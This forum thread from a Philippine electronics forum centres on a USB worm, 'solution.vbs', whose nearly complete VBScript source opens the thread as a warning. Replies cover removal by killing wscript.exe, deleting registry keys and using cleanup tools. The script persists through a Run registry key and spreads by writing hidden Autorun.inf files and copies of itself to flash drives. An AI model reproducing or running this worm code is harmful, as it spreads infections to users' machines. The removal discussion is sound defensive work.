|
Siramiko
|
 |
« on: June 17, 2009, 09:40:42 PM » |
|
warning another virus nakita nkuha sa usb flash drive post ko dito na kung sakali mavirus kayo nito alam nyu alaing registry ang binabago ng virus dinelete kong ang ilang code para hindi na magamit kung sakaling copyahin
On Error Resume Next Dim fso, wscr, tf, scrText, win, ax, pug, pou
Set fso = CreateObject("Scripting.FileSystemObject") Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0) tf = WScript.ScriptFullName x = LCase(tf)
If Mid(x, 4) = "solution.vbs" Then wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1) Do Until myFile.AtEndOfStream scrText = scrText & myFile.ReadLine & vbCrLf Loop
ax = fso.FileExists(win & "\solution.vbs")
Set myFile = fso.CreateTextFile(win & "\solution.vbs", true) myFile.write scrText myFile.close
Set fAttr = fso.Getfile(win & "\solution.vbs") fAttr.Attributes=39
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
While (true)
Set myDrives = fso.Drives For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf") fAttr.Attributes=32 fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true End If Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true) auFile.write "[autorun]" & vbCrLf & "open=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Command=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Default=1" auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf") fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\solution.vbs", true) myFile.write scrText myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\solution.vbs") fAttr.Attributes=39
End If
Next
With wscr .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs""" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD" End With
pug = fso.Deletefile("C:\WINDOWS\auto.vbs")
Wend
|
|
|
|
|
Logged
|
I shall return
|
|
|
|
The Philippine Electronics and Technology Forum
|
 |
« on: June 17, 2009, 09:40:42 PM » |
|
|
|
|
|
|
Logged
|
|
|
|
7_SeVeN_7
Technical People
Solar Power Satellite
   
Pogi/Ganda Points: 380
Offline
Posts: 5954
There is no delight in owning anything unshared.
|
 |
« Reply #1 on: June 17, 2009, 09:59:09 PM » |
|
|
|
|
|
|
Logged
|
E-Gizmo Mechatronix Central: www.e-gizmo.comTel #: (63)(2) 536-3378 Globe +63915-973-7691 Smart +63921-779-0748 Location MapYM: julie.egizmo aka Born2BeWired 
|
|
|
Positron E+
Gas Turbine

Pogi/Ganda Points: 128
Offline
Posts: 2709
You have No GOD?, You have No Peace of mind.
|
 |
« Reply #2 on: June 17, 2009, 10:10:20 PM » |
|
ganun rin ginawa ko.  saka para maiwan ito idelete nyo yung autorun tapos sa VIEW option ng windows explorer niyo uncheck niyo mga hide na file para makita niyo yung mga nakahide na file sa use at sa hardisk,ingat lang sa pagdelete baka madelete boot.ini at iba pang system files 
|
|
|
|
|
Logged
|
|
|
|
|
Woots29
|
 |
« Reply #3 on: June 18, 2009, 09:49:19 AM » |
|
delete process agad ang wscript.exe
tapus delete the vbs
then check ko policy editor para sa regstry enabling
tapus hahanapin ko sa regedit ung mga keys na nabago
|
|
|
|
|
Logged
|
|
|
|
|
Dennis
|
 |
« Reply #4 on: June 22, 2009, 02:15:36 PM » |
|
kapag nalagay sa registry at nakatago ang file ng virus kahit anong delete ay paulit-ulit parin yan na gagawa ng file. kasi nasa code niya yung na gumawa siya ng file. sa mga virus naman na nag-iinfect ng executable file kapag denilete mo yung main file at sa registry, kapag naipatakbo mo yung executable file na infected gagawa uli yan ng address sa registy ganun rin ng panibagong file
|
|
|
|
|
Logged
|
Failure is not defeated, Unless you stop trying
OmegaByte®, Explicitmind®, DMSoftware®
|
|
|
orravan
Size AAA Battery
 
Pogi/Ganda Points: 2
Offline
Gender: 
Posts: 79
"I know i'm not good yet, but soon I will"
|
 |
« Reply #5 on: August 04, 2009, 02:01:14 PM » |
|
sir techno08 mayroon na bang step by step procedure how to permanently clear the solution.vbs
pc namin sa office then pc ko sa bahay both have the same problem end process ko sa task manager then delete all entry sa regedit.
kaso the next time na isaksak ko ulit un flash drive eh bumabalik parin... hope to hear from you o link me to other post.
thanks
|
|
|
|
|
Logged
|
|
|
|
|
hardcore misery
|
 |
« Reply #6 on: August 13, 2009, 05:40:45 AM » |
|
kailangan bang i-delete tong mga keys na to?
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs""" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
|
|
|
|
|
Logged
|
|
|
|
|
Woots29
|
 |
« Reply #7 on: August 14, 2009, 12:00:38 PM » |
|
yes kelangan
pero ung una lang na line
|
|
|
|
|
Logged
|
|
|
|
|
hardcore misery
|
 |
« Reply #8 on: August 15, 2009, 07:11:10 AM » |
|
tinignan ko na sa registry, wala na pala sa PC ko.hehe
|
|
|
|
|
Logged
|
|
|
|
|
bluegirl
|
 |
« Reply #9 on: October 26, 2009, 12:55:57 AM » |
|
na delete q yan using combo fix.. ewan q kung saan aq nakadownload nun dati.. para xang command prompt
|
|
|
|
|
Logged
|
“Mathematics is made of 50 percent formulas, 50 percent proofs, and 50 percent imagination.”
|
|
|
xeed
CR2032 Battery

Pogi/Ganda Points: 0
Offline
Gender: 
Posts: 14
|
 |
« Reply #10 on: March 10, 2010, 09:27:59 PM » |
|
i suggest to use this apps, freeware nmn xa. useful naman xa mtagal ko na xang gngmt, blocks all autorun, .vbs usb viruses, etc. here's the link: hxxp://oldmcdonald.wordpress.com/ http://oldmcdonald.wordpress.com/
|
|
|
|
|
Logged
|
|
|
|
|
bluegirl
|
 |
« Reply #11 on: March 10, 2010, 11:03:51 PM » |
|
dati combofix yung naka delete sa .vbs q na virus yung may SSG virus
|
|
|
|
|
Logged
|
“Mathematics is made of 50 percent formulas, 50 percent proofs, and 50 percent imagination.”
|
|
|
Karl80
CR2032 Battery

Pogi/Ganda Points: 1
Offline
Posts: 16
|
 |
« Reply #12 on: April 09, 2010, 08:28:45 PM » |
|
haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.
tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f
|
|
|
|
|
Logged
|
|
|
|
theeye23
CR2032 Battery

Pogi/Ganda Points: 0
Offline
Posts: 49
The eye is looking at you! :D
|
 |
« Reply #13 on: April 09, 2010, 10:28:56 PM » |
|
haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.
tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f
This one is good, if you suspected that you are infected with a .VBS or .JS worm, the first thing you should do is kill the WSCRIPT.EXE on process using either the Task Manager or taskkill command in Start Menu + Run. Then remove the startup entries of the worm using MSCONFIG. But if you do not feel the manual removal then I suggest you use the Noob Killer by leerz or Ampaw Smasher X by sir t68kv to remove VBS or JS worms.
|
|
|
|
|
Logged
|
Mag-ingat sa mga asal talangka, hihilahin ka nila pababa!
Namamato pag ika'y hitik... hitik sa bunga!
|
|
|
de PatAtas
Diesel Generator
Pogi/Ganda Points: 319
Offline
Gender: 
Posts: 1267
' The unbreakable
|
 |
« Reply #14 on: April 10, 2010, 11:24:19 AM » |
|
' avenger din...pang alis ng VBS...virus
|
|
|
|
|
Logged
|
' there are many different ways to love..
|
|
|
|
jacks
|
 |
« Reply #15 on: April 10, 2010, 12:57:15 PM » |
|
SCBing.........
|
|
|
|
|
Logged
|
|
|
|
|
9 Volts
|
 |
« Reply #16 on: April 10, 2010, 02:43:40 PM » |
|
patulong naman po sa trojan ng comp ko, di ko maalala eh, ano po magaling na pagtanggal nun,
eto na gamit ko ayaw pa rin matanggal. kaspersky ASO system protector Spybot S&D Windows def
di pa rin nila madetect.. hayz
|
|
|
|
|
Logged
|
If we hear, we forget; if we see, we remember; if we do, we understand. -- Proverb
|
|
|
|
jacks
|
 |
« Reply #17 on: April 10, 2010, 08:07:49 PM » |
|
Post mo symptoms nya. Ano ginagawa, pero siguro sa ibang thread na.
|
|
|
|
|
Logged
|
|
|
|
|
9 Volts
|
 |
« Reply #18 on: April 10, 2010, 08:43:04 PM » |
|
Trojan-Dropper.vb.zk
yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?
patulong mga masters..
|
|
|
|
|
Logged
|
If we hear, we forget; if we see, we remember; if we do, we understand. -- Proverb
|
|
|
theeye23
CR2032 Battery

Pogi/Ganda Points: 0
Offline
Posts: 49
The eye is looking at you! :D
|
 |
« Reply #19 on: April 10, 2010, 10:08:51 PM » |
|
Trojan-Dropper.vb.zk
yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?
patulong mga masters..
Try to scan in Safe Mode.
|
|
|
|
|
Logged
|
Mag-ingat sa mga asal talangka, hihilahin ka nila pababa!
Namamato pag ika'y hitik... hitik sa bunga!
|
|
|
|
The Philippine Electronics and Technology Forum
|
|
|
|
|
|
Logged
|
|
|
|
|